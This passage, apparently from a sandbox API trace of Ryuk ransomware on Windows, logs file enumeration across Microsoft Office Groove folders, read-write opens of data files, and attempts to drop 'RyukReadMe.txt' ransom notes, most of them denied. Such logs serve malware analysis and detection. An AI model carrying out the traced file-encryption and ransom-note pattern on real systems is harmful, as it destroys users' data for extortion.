(hObject=0xffffffffffffffff) returned 0 [0137.300] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.300] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.300] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.301] SetLastError (dwErrCode=0x0) [0137.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.304] GetLastError () returned 0x5 [0137.304] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.304] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.304] SetLastError (dwErrCode=0x0) [0137.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.304] GetLastError () returned 0x5 [0137.304] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.304] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2d00 [0137.305] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.306] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.306] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg", dwFileAttributes=0x80) returned 0 [0137.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\briefcaseicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.306] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.307] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIconMask.bmp", dwFileAttributes=0x80) returned 0 [0137.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\briefcaseiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.307] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.307] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\circleicons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.308] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.308] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.308] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\circleiconsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.309] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.309] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg", dwFileAttributes=0x80) returned 0 [0137.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\meetingicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.309] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.309] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIconMask.bmp", dwFileAttributes=0x80) returned 0 [0137.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\meetingiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.310] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.310] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.310] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.310] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusicons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.311] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusiconsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.312] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.312] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg", dwFileAttributes=0x80) returned 0 [0137.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.312] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.312] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp", dwFileAttributes=0x80) returned 0 [0137.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.313] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.313] SetLastError (dwErrCode=0x0) [0137.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.313] GetLastError () returned 0x5 [0137.313] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.313] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2d60 [0137.313] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.313] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.313] SetLastError (dwErrCode=0x0) [0137.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.314] GetLastError () returned 0x5 [0137.314] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.314] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.314] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.314] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.314] SetLastError (dwErrCode=0x0) [0137.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.314] GetLastError () returned 0x5 [0137.314] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0) returned 0 [0137.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.314] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\*.*", lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0x3a2e20 [0137.314] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.314] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\DEFAULT.XSL", dwFileAttributes=0x80) returned 0 [0137.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\DEFAULT.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\basic\\default.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.315] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0 [0137.315] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0137.315] SetLastError (dwErrCode=0x0) [0137.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\basic\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.315] GetLastError () returned 0x5 [0137.315] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0) returned 0 [0137.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.316] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.316] SetLastError (dwErrCode=0x0) [0137.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.316] GetLastError () returned 0x5 [0137.316] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0) returned 0 [0137.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\*.*", lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0x3a2e20 [0137.317] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.317] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\Hierarchy.js", dwFileAttributes=0x80) returned 0 [0137.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\Hierarchy.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\hierarchy.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.318] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.318] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.318] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\Hierarchy.xsl", dwFileAttributes=0x80) returned 0 [0137.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\Hierarchy.xsl" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\hierarchy.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.318] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.318] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\MINUS.GIF", dwFileAttributes=0x80) returned 0 [0137.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\MINUS.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\minus.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.319] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.319] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\PLUS.GIF", dwFileAttributes=0x80) returned 0 [0137.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\PLUS.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\plus.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.319] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.320] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0137.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\SPACER.GIF", dwFileAttributes=0x80) returned 0 [0137.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\SPACER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\spacer.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.320] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.320] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0 [0137.320] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0137.321] SetLastError (dwErrCode=0x0) [0137.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.324] GetLastError () returned 0x5 [0137.324] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0) 